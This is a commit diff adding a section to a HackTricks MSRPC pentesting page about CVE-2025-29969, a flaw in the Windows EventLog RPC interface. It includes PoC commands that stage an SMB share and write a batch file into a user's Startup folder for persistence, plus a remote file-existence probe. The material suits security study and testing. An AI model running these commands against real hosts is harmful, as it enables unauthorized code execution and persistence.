Merge pull request #2010 from HackTricks-wiki/update_EventLogin_-_CVE-2025-29969_20260316_130744

carlospolop · web-flow · commit f60651e38dcb · 2026-03-31T00:46:28.000+02:00
EventLogin - CVE-2025-29969
diff --git a/src/network-services-pentesting/135-pentesting-msrpc.md b/src/network-services-pentesting/135-pentesting-msrpc.md
@@ -69,6 +69,36 @@ All options except `tcp_dcerpc_auditor` are specifically designed for targeting
 - **Named Pipe**: `\pipe\epmapper`
 - **Description**: DCOM interface, used for brute-force password grinding and information gathering via WM.
 
+
+### MS-EVEN (EventLog Remoting) primitives
+
+The **MS-EVEN** RPC interface (named pipe `\pipe\even`) exposes Eventlog operations. SafeBreach’s **CVE-2025-29969 (EventLog-in)** analysis shows a **TOCTOU** flaw in MS-EVEN that lets an **authenticated low-privileged** user trigger a **remote arbitrary file write** on the target: attacker-chosen content written to an attacker-chosen path without needing Administrator rights for the remote write.
+
+Operational pattern (PoC workflow): stage a **valid EVTX** plus your payload on an SMB share, then race the MS-EVEN logic so the target fetches the SMB-hosted file and writes it to the chosen path.
+
+```bash
+impacket-smbserver -smb2support Share /tmp/safebreach
+```
+
+The published PoC uses a **hard-coded SMB share name** (`Share`), so if you change it you must also update the script.
+
+```bash
+python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123   "/tmp/safebreach/Sample.evtx" "calc.bat"   "C:\Users\lowuser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\target.bat"
+```
+
+A common chain is to drop into a **per-user Startup folder** for persistence and execution on the next logon (execution occurs in that user context).
+
+#### MS-EVEN CreateFile-style primitive for recon
+
+MS-EVEN also exposes a **file open/create** primitive (described in the PoC as `CreateFile`) that can be used by any authenticated user to **probe whether a remote file or directory exists**. This is useful for software discovery by checking common install paths (e.g., `C:\Program Files\<Vendor>`):
+
+```bash
+python check_if_exists.py 192.168.56.57 lowuser Password1! "C:\Program Files\Wireshark"
+
+Result:
+FILE_EXISTS_AND_IS_DIRECTORY
+```
+
 ### Identifying IP addresses
 
 Using [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver), comes from [Airbus research](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/) is possible to abuse the _**ServerAlive2**_ method inside the _**IOXIDResolver**_ interface.
@@ -226,6 +256,8 @@ A single out-of-bounds write or unexpected exception will be surfaced immediatel
 
 ## References
 
+- [EventLogin-CVE-2025-29969 (SafeBreach-Labs)](https://github.com/SafeBreach-Labs/EventLogin-CVE-2025-29969)
+- [EventLog-in: Propagating With Weak Credentials Using the Eventlog Service in Microsoft Windows](https://www.safebreach.com/blog/safebreach_labs_discovers_cve-2025-29969/)
 - [Automating MS-RPC vulnerability research (2025, Incendium.rocks)](https://www.incendium.rocks/posts/Automating-MS-RPC-Vulnerability-Research/)
 - [MS-RPC-Fuzzer – context-aware RPC fuzzer](https://github.com/warpnet/MS-RPC-Fuzzer)
 - [NtObjectManager PowerShell module](https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/tree/master/NtObjectManager)
